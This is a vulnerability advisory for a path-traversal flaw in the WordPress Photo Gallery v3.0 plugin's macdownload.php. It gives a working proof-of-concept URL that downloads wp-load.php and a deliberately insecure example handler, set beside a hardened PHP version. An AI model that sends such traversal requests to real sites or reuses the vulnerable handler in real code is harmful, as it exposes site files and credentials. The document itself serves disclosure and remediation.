WordPress Plugin Photo Gallery v3.0 - Arbitrary File Download

2017-03-20T00:00:00
ID SSV:92796
Type seebug
Reporter 孤独风
Modified 2017-03-20T00:00:00

Description

Vulnerability title: WordPress Plugin Photo Gallery v3.0 - Arbitrary File Download

Vulnerability type: Arbitrary File Download (path traversal)

Affected version: Photo Gallery v3.0

Vulnerable URL:

http://localhost/[PLUGIN_PATH]/macdownload.php

Vulnerability details:

The flaw is in the plugin's macdownload.php file. The script reads the file named by the albid parameter and sends it to the client without validating or sanitizing the value, so a traversal sequence such as ../ allows any file readable by the web server process to be downloaded, including files outside the plugin directory (wp-config.php-style configuration files among them). The script is reachable without going through WordPress, since it is requested directly from the plugin path rather than through an admin action.

Exploit

1. Download the wp-load.php file. A plugin installed under wp-content/plugins/ sits three directory levels below the WordPress root, so ../../../ from the plugin path resolves to that root; adjust the depth if the plugin is installed elsewhere:

http://localhost/[PLUGIN_PATH]/macdownload.php?albid=../../../wp-load.php

A successful response returns the PHP source of wp-load.php as a download instead of an error, which confirms the traversal.
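The following is an added example written for this page; it is not the plugin's own code, which is not reproduced here. It reconstructs the pattern the advisory describes (a request parameter used directly as a file path) next to a hardened handler. The uploads directory, the allowed file extensions and the authorization hook are assumptions made for illustration.

```php
<?php
// Added example, not the Photo Gallery plugin's code. The directory name,
// the allowed extensions and the authorization hook are assumptions.

// --- Vulnerable pattern (reconstructed from the advisory's description) ---
function vulnerable_download(string $albid): void
{
    // albid is concatenated into the path unchanged, so
    // albid=../../../wp-load.php walks out of the gallery directory and
    // serves WordPress core files (or anything else the web server can read).
    $file = __DIR__ . '/uploads/' . $albid;
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="' . basename($file) . '"');
    readfile($file);
}

// --- Hardened handler: returns a validated absolute path or null ---
function resolve_download(string $albid): ?string
{
    $base = realpath(__DIR__ . '/uploads');
    if ($base === false) {
        return null;
    }

    // 1. Syntactic allowlist: a plain file name with an expected extension.
    //    This alone rejects "/", "\", "..", null bytes and URL-encoded tricks.
    if (!preg_match('/^[A-Za-z0-9_-]+\.(zip|jpe?g|png|gif)$/', $albid)) {
        return null;
    }

    // 2. Semantic check: resolve symlinks and confirm the real path is still
    //    inside the base directory. realpath() returns false for missing files,
    //    so a probe for non-existent paths fails the same way as a traversal.
    $path = realpath($base . DIRECTORY_SEPARATOR . $albid);
    if ($path === false || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    if (!is_file($path)) {
        return null;
    }
    return $path;
}

// Hypothetical authorization hook: a real plugin would check that the caller
// may download this album (WordPress capability or nonce check) before
// serving anything. Stubbed here because the advisory does not describe it.
function caller_may_download(string $albid): bool
{
    return true; // assumption: replace with the plugin's own access check
}

// Endpoint body
$albid = isset($_GET['albid']) ? (string) $_GET['albid'] : '';
$path  = resolve_download($albid);
if ($path === null || !caller_may_download($albid)) {
    http_response_code(400);
    exit('invalid album id');
}
header('Content-Type: application/octet-stream');
header('X-Content-Type-Options: nosniff');
header('Content-Disposition: attachment; filename="' . basename($path) . '"');
readfile($path);
```

The two checks are deliberately redundant: the regex stops traversal strings before they touch the filesystem, and the realpath containment test catches anything the pattern misses, such as a symlink inside the uploads directory that points back at the WordPress root. Stripping ../ with a string replace is not a substitute, since sequences like ....// survive a single pass.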